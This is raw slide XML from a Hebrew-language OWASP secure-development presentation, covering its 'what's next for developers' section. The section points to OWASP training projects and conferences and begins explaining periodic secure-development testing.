                <a:rPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>פרוייקט</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> מאפשר ליצור חומרי הדרכה לסייע לחנך מפתחים בנושא פיתוח יישומי </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> בצורה מאובטחת. עבור לימוד מעשי של חולשות אבטחה, קיימים הפרוייקטים </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>NodeJS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>Goat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP Juice Shop </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> או </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. על-מנת להישאר עדכני, מומלץ להגיע ל-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t> OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>AppSec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, כנסי הדרכה של </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, או </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP Chapter </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5796261" y="6996761"/>
              <a:ext cx="940189" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>מודעות לפיתוח</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> מאובטח</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>מה הדבר הבא עבור מפתחים</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{19252D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769971" y="3119064"/>
            <a:ext cx="1034404" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>דרישות פיתוח מאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{101040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724255" y="6207001"/>
            <a:ext cx="1073874" cy="341632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תהליך פיתוח מאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3598841454"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335630">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>יישמו תהליך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> בדיקות פיתוח מאובטח בצורה מחזורית</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7817770">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חשוב לפתח קוד בצורה מאובטחת. אך זה מהותי לוודא כי האבטחה הנדרשת מיושמת בפועל, מיושמת בצורה נכונה, ומיושמת בכל מקום בו היא אמורה להיות. המטרה של תהליך בדיקות פיתוח מאובטח להוות הוכחה לקיום האבטחה.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>העבודה קשה ומורכבת, ותהליכי פיתוח מודרניים ומהירים כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
